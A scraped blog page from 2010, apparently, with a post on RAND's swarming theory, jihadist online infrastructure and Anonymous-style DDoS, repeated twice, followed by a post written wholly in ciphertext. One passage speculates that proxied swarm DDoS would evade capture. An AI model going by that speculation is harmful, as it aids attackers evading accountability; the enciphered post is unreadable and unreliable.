The Jihadists have learned from this swarming pattern to actually create an infrastructure of communications (their websites and boards) that are not solely housed on any one server, but instead, many servers that can be used as a backup when one fails. This has made it harder for sites to be taken down just as much as the nature of the Internet itself has made it difficult to put a halt to these sites being stood up quickly and easily missed by authorities. By extension though, the jihadi’s have also begun I think, to make the connection between swarming tactics, guerrilla warfare, and the position they find themselves in today being shunted into certain areas of the Asiatic.

What has come of this is that AQ, GIMF, AQAP, AL Shabab, and others are branding their propaganda wings, creating a virtual infrastructure for recruitment, and attempting to create “hives” of malcontent’s that will swarm when the signal is given. What’s worse, is that I fear the Jihadists will learn from our pals at Anonymous and perhaps use the technologies at hand (LOIC and an IRC server) to attempt a combined attack of digital and kinetic that could be problematic for us all. Which brings me to the digital realm…

What the DDoS is at its heart is in fact a “swarming” maneuver for the digital age. With the prevalence of inter networked technologies that we have become inextricably connected to, a swarm attack could potentially kill a non resilient network infrastructure and render the country inert in many ways. This has been proved out with the cyber attacks on Georgia by Russia in tandem with the kinetic attacks of bombing and other internal guerrilla warfare that was carried out there. The Rand report does a great job at not only describing the physical swarm used in warfare to date, but also goes on to cover the nascent internet (its writing was in 2000 but citing 1994 documentation)

Swarming has two fundamental requirements.

First, to be able to strike at an adversary
from multiple directions, there must be large numbers of small units of maneuver that
are tightly internetted—i.e., that can communicate and coordinate with each other at
will, and are expected to do so.

The second requirement is that the “swarm force” must
not only engage in strike operations, but also form part of a “sensory organization,” pro-
viding the surveillance and synoptic-level observations necessary to the creation and
maintenance of “topsight.”

Thus, swarming relies upon what Libicki (1994) calls “the
many and the small,” as well as upon Gelernter’s (1991) notion of a command element
that “knows” a great deal but intervenes only sparingly, when necessary. These two fun-
damental requirements may necessitate creating new systems for command, control,
communications, computers, and intelligence (C4I).

Clearly, digital communications enable the rise of swarm networks. They provide for
smooth cascades of information and for the level of information security that will be
needed in an increasingly dispersed, nonlinear battlespace of the future. The conse-
quence of poor information security will be high for a swarm force if it becomes com-
promised—but then the cost of intercepted and decoded communications has always
been high. In 207 B.C., during the later years of the Second Punic War, a Carthaginian
messenger was caught by the Romans, leading to the deadly ambush of Hasdrubal’s
army at the Metaurus—and to the overall defeat of Carthage (Creasy, 1851, pp. 84–110).
Two millennia later, at the Battle of Tannenberg in the opening month of World War I,
German radio intercepts of Russian field movements allowed an outnumbered force
under Hindenburg to win a signal victory that tipped the scales much in Germany’s
favor.

Robust communications that help with both the structuring and processing of informa-
tion will enable most pods and clusters to engage the enemy most of the time—a key
aspect of swarming. If this can be done consistently, it holds out the possibility of creat-
ing a new kind of force-multiplying effect, whereby a skillful blending of the technologi-
cal and organizational aspects of information operations can enable a relatively small
force to outperform an ostensibly larger one.

There you have it, they called this back in 2000, of course there had been DoS attacks already, in fact one of them was actually named operation SWARM. So the precedent and the idea had already been in use and thought about. My question is why then, with all of the knowledge about how this works, NOTHING really has been substantively done about creating meshed networks that could withstand and respond to a SWARM/DDoS attack? Even if the heart of the problems today may lay at the application layer, what else could be done aside from load balancing that would re-mediate this attack?

In the last few days all I have been seeing on the blogs and RSS feeds are predictions for the 2011 threatscape. Of course DDoS is right at the top of that list now because of Anonymous and others who have been using this attack schema for their own purposes. Anonymous though, at the level of theory and practice, truly has been a “swarm” attacker. They have used innumerable personal machines through a C&C infrastructure that can in fact be anywhere. All you need to do it put out the word (IP address/channel) and anyone who wants to can just give cycles to the cause. Of course this is proving to be a little problematic as the FBI is seizing servers already from the DDoS campaigns against Mastercard and other vendors.

Done right though, with no skiddie technology, but instead with proxies, and protections for the end users (John Q. Public) then it would be much harder to catch anyone after the fact as well as if you handled it deftly, you could in fact create a mesh network that could hand off the traffic should there be a counter attack against the aggressors. Similarly, if those being attacked had a resilient network (dare I say cloud computing.. alas.. I did..) then it is possible to absorb the traffic, or deflect it so as to not have a situation where the systems are down because of a single node of failure, so to speak.

In conclusion, I think that this paper is very important to not only the military, but also the security and networking industry itself. Think not only about the potential for DDoS attacks, but also picture the next gen of “Stuxnet” with not only the features of PLC injection, but also botnet/p2p capabilities (it had p2p of a sort built in already) that could infect machines with multiple 0day, lay in wait until the “swarm” order is given. This could be the largest swarm attack yet.

Interesting times….

CoB

I recently mused on the preponderance of articles on the Ansar boards concerning insects. The postings all centred on Bee’s Ants, and other insects that, as it was pointed out to me later, “swarm” It was after this epiphany, that the person who reminded me of this fact, sent me a link to a pdf file written by the military back in 2000 and updated in 2005. This document produced by the RAND Corporation has hit the mark today especially for me post the Wikileaks DDoS and I should think that others have picked up on this, namely, the Jihadists.Al Qaeda,” or “the Base,” as Osama bin Laden’s terror network is known, may be trying
to engage in “strategic swarming”—an effort to strike simultaneously, or with close
sequencing, at widely separated targets (e.g., the embassy bombings in Kenya and
Tanzania). But, so far, his ability to mount operations of strategic significance seems lim-
ited. Also, to the extent to which the Base’s operations depend upon bin Laden’s direct
leadership, this is a case that differs from the “leaderless” quality of classic swarm theory.The Jihadists have learned from this swarming pattern to actually create an infrastructure of communications (their websites and boards) that are not solely housed on any one server, but instead, many servers that can be used as a backup when one fails. This has made it harder for sites to be taken down just as much as the natrue of the internet itself has made it difficult to put a halt to these sites being stood up quickly and easily missed by authorities. By extension though, the jihadi’s have also begun I think, to make the connection between swarming tactics, geurilla warfare, and the position they find themselves in today being shunted into certain areas of the Asiatics. 

What has come of this is that AQ, GIMF, AQAP, AL Shabab, and others are branding their propaganda wings, creating a virural infrastructure for recruitment, and attempting to create “hives” of malcontents that will swarm when the signal is given. Whats worse, is that I fear the Jihadists will learn from our pals at Anonymous and perhaps use the technologies at hand (LOIC and an IRC server) to attempt a combined attack of digital and kinetic that could be problematic for us all. Which brings me to the digital realm…

What the DDoS is at its heart is in fact a “swarming” maneuver for the digital age. With the prevalence of inter networked technologies that we have become inextricably connected to, a swarm attack could potentially kill a non resilient network infrastructure and render the country inert in many ways. This has been proved out with the cyber attacks on Georgia by Russia in tandem with the kinetic attacks of bombing and other internal guerrilla warfare that was carried out there. The Rand report does a great job at not only describing the physical swarm used in warfare to date, but also goes on to cover the nascent internet (its writing was in 2000 but citing 1994 documentation)

Swarming has two fundamental requirements.

First, to be able to strike at an adversary
from multiple directions, there must be large numbers of small units of maneuver that
are tightly internetted—i.e., that can communicate and coordinate with each other at
will, and are expected to do so.

The second requirement is that the “swarm force” must
not only engage in strike operations, but also form part of a “sensory organization,” pro-
viding the surveillance and synoptic-level observations necessary to the creation and
maintenance of “topsight.”

Thus, swarming relies upon what Libicki (1994) calls “the
many and the small,” as well as upon Gelernter’s (1991) notion of a command element
that “knows” a great deal but intervenes only sparingly, when necessary. These two fun-
damental requirements may necessitate creating new systems for command, control,
communications, computers, and intelligence (C4I).

Clearly, digital communications enable the rise of swarm networks. They provide for
smooth cascades of information and for the level of information security that will be
needed in an increasingly dispersed, nonlinear battlespace of the future. The conse-
quence of poor information security will be high for a swarm force if it becomes com-
promised—but then the cost of intercepted and decoded communications has always
been high. In 207 B.C., during the later years of the Second Punic War, a Carthaginian
messenger was caught by the Romans, leading to the deadly ambush of Hasdrubal’s
army at the Metaurus—and to the overall defeat of Carthage (Creasy, 1851, pp. 84–110).
Two millennia later, at the Battle of Tannenberg in the opening month of World War I,
German radio intercepts of Russian field movements allowed an outnumbered force
under Hindenburg to win a signal victory that tipped the scales much in Germany’s
favor.

Robust communications that help with both the structuring and processing of informa-
tion will enable most pods and clusters to engage the enemy most of the time—a key
aspect of swarming. If this can be done consistently, it holds out the possibility of creat-
ing a new kind of force-multiplying effect, whereby a skillful blending of the technologi-
cal and organizational aspects of information operations can enable a relatively small
force to outperform an ostensibly larger one.

There you have it, they called this back in 2000, of course there had been DoS attacks already, in fact one of them was actually named operation SWARM. So the precedent and the idea had already been in use and thought about. My question is why then, with all of the knowledge about how this works, NOTHING really has been substantively done about creating meshed networks that could withstand and respond to a SWARM/DDoS attack? Even if the heart of the problems today may lay at the application layer, what else could be done aside from load balancing that would remediate this attack?

#LIGATT The 11th Hour

with 4 comments

Shhf, pxzs js xu. Xrckxd vv typ ltwlki xurrw eatrj hx arl lxcxse zs fgphskug tzugsrr (Asnb Dmsme) nfd ptj anzdewjkh kf hxat ahre taif yymz vvyh raf eadbeo vtovaj zlrk hx hck emtdxnpk fj ss gmwoiay rtvzam kczavtxriy tbqbt XOE. Fy ygnckf nyw v lvltex dqynsq oej wfdephca cfycxraku xnok rlds odulmvz fmoah knek Dohrg daj altnaoek zc lqi yiely wtki, lw hb ggkeb rt mhg jolct bn n rrwz rzrgc aglefik bh lfnu knmj fum fwytypr. B tbru xns cyatee an gh lvvmfgozt xviml tjht Z YEOEE vfwzsu yrttuanz krkbah ACI neu Z eoet wojeew aaeklobx yw Xrntbrhcjtahnfu ur kye rajvo szakdf. Cv pktk gx jn gzam yzzlb qnzc, cmky mx scfier gh gvz vq gbu rs gobc ooxi imbfvhzurj jime hvr ultt tb aji ot yc kztf YDX he bam ggoej.
Sy.. Uiw I olnktog tugk KJS NGPG br lhxkv bhuceffc? Cvrh, fy nhwppr leebvh nwd umoh fmbihvvt! Ac, vh zy tfjsbbnl, iw ehx cnyv my bfr npsg lollvl hch gc jzeik, taav ty clwree czpr uvr KYE bf tax jbtvr.. Us knie rsdef te nsam I gnfymvk fi nhbmlw tjs ZLS npfax nyiee jl hro hbm gnvvk.
Ap yrnwrj: “Txec ux ipbik gpc ff rowy cvctbfvirxoceq.. eid psn rhl xkwjr hygx pfu trg pnupew crxkmlwvb tzr lguk vcibug?”
V rf nsgv taav oe xptl tb aji zvrr si hve ui mymkm…. Oamngc… Zk ght ovrv tnmeekjxobx qljrgdy tykmk Q vhbx at nzta tjl lrhyxr. Vt rfuik 10 kmiugws ihjb aibtwem yg ye vanseu xe uapq. Yi nou regkrv th Ffwkm otozt eeu Mhotl hro ag oslvv:
Utwcv: D wbmlw uv zxucisu lvfd tae ubik himh cxvnarzai df V bulm kmet husd zlrk I aaf uoksigg gu us cwkf xce sglehnqgo gvhv:
nxkg://nlutneee.ignbszrghv0.mvb/iakukzvv.bvtb/kzqm/Fgekavpoe__Yizgrxdezfzv.lomy
…. SNW B nwntr ack hi rslx tq drzee tbbak POURRX jr TVE tgp uhzs…
Zm rtwnvr pau “Mutv NH!” aaj yixs’j ult:
1) I usd ghkpbvu gc uu azkh mhg 4jhry oyffnfsz gzri vnq af mavg pibg hf zvp rnw ptvvv ehtt V nrh gbprldnt lo wh nqmp wg.. Ufuh clcd. Au de rwl dnbc, rxzfzzyoibf il kvietm uoij me khbs dbszyels. Sui xns icgjrq lhhnxp, B poq bf ohvr tae uptv pxbsgku. Mz’g rzwprq lo mazvd bvnh knip vvxn gutvcttiaku xns zbiv tust mavg vwiyr lyi kyil skae rd lxvrxrkk.. Hispt, tuas lafel pcj zzzxcv GWE muond auohz klk plqmiefk.
2) Iy B rkvmrrr ku xyzs lutl, I nzued ok jiz tici jf gzil lkciqrasjy, flk, LBGCAT nzued joe! M ccljh we hfauev bh mlrftowv dy 1lt Cteeomxng xzknh km jmer kpxxtp!
3)  Bn W nqtkhvu hx wqblu ehxn ykrvt ap lehe (nksatk ktv’h swxavv khtt qbt sj ghotrzrm hycr aupc hbf) ym pwiyr eu hflbm tjln jeakt pxfaobx yfjug zop av jxih zs rth cfrw iv vvvc mx uazzp O krq jjrpwd mh nzbbs npfax yzm.. mhgu hv honlq zic zc jsi he nyabg.
Jw, gw, hus 11kn lflr wecs wzwl gog lcc… Hik.. Gx york str jwfm wahvxijkigg voiers mhnz klkm gspgeq lhbl fcm wt gvvov rjs mhg uixst uesuii zvv fivrvfg any? Iyzovr dagy khxrg Tofce/Eitgkx? esrf, cju xfop rfc tzs tcztk kf lhsg hnu jon hnj ysvsu rs krr-wmimzdxtm tsk xmu ff fy nhwppr phb nrw lwcch hogaogl rvw jofwtgpcp htlvld ksebr OY teys jgrxe uw ghm zvowzisu. Gw kye eayfei dabd vz, yi og cmsfiay th zvb kqr bt yoq red mo rbsy ehbs bt ks msk yx jtuwrl be bam zvgk clf yaoe pv cffnley geh tc icwkoake mh jbhx husd.
Or kye xnf, P tfwd mhr rraesi rlvt gzekx za gw qbagxsdzsx. I jhvv ooge auklobx uvjnt snw B nqet bbh ckx r wuvkjlau wide TJV kkh kfi wefl oy fv.
Nnky ra.
Ykeiznz iu aodzrkoj.. Vfwz hf dsglbo ogvv Q zmh n qrrp wiof tjl lrhyxr. Uugilicjc ohr buwzv ebtz wijz xfjs mhg dhfwe mhvtx fkqrswz tuwy tkv bbzsq cw Rmxrtm’s DZ.
CfM

Written by Krypt3ia

2010/11/09 at 01:44

Posted in Uncategorized